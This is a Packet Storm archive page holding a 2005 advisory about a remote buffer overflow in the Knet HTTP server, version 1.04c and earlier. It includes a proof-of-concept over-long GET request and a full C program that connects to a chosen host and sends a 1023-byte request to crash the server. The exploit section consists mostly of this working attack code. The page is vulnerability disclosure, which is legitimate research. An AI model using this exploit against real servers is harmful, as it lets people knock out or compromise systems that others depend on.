what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

knetDoS104c.txt

knetDoS104c.txt
Posted Feb 28, 2005
Authored by CorryL | Site x0n3-h4ck.org

Knet versions 1.04c and below are susceptible to a remote buffer overflow vulnerability that allows for execution of code. Exploit provided.

tags | exploit, remote, overflow
SHA-256 | 60916343a3d935b16e07490d6a9c71a0069c13e49589207f3b8f49047e798544

knetDoS104c.txt

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet <= 1.04c ]=-
-=[
]=-
-=[ Author: CorryL [corryl80@gmail.com] ]=-
-=[ x0n3-h4ck.org ]=-
-=[----------------------------------------------------]=-


-=[+] Application: Knet
-=[+] Version: 1.04c
-=[+] Vendor's URL: www.stormystudios.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ CorryL[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org


..::[ Descriprion ]::..

Knet is an small http server,easy installation and use.


..::[ Bug ]::..

This software is affected a Buffer Overflow.
A malitious attacker sending the request GET AAAAAA..... to 522,
this cause the overwrite of the eip registry,causing the execution of
malicious code.

..::[ Proof Of Concept ]::..

GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long

..::[ Exploit ]::..

/*

KNet <= 1.04c is affected to a remote buffer overflow in GET command.
This PoC demostrate the vulnerability.


KNet <= 1.04c PoC Denial Of Service Coded by: Expanders

Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>


*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void help(char *program_name);


int main(int argc, char *argv[]) {

struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n[Finished] Check the server now\n");
}
else
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;

}

void help(char *program_name) {

printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
printf("\t-=[ ]=-\n");
printf("\t-=[ Coded by
ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
printf("Usage: %s <Host> <Port>\n",program_name);
}


..::[ Workaround ]::..

Waiting for an official patch


..::[ Disclousure Timeline ]::..

[17/02/2005] - Vendor notification
[17/02/2005] - Vendor Response
[25/02/2005] - No patch relase from vendor
[25/02/2005] - Public disclousure

_________________________________
www.seekstat.it is your web stat
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close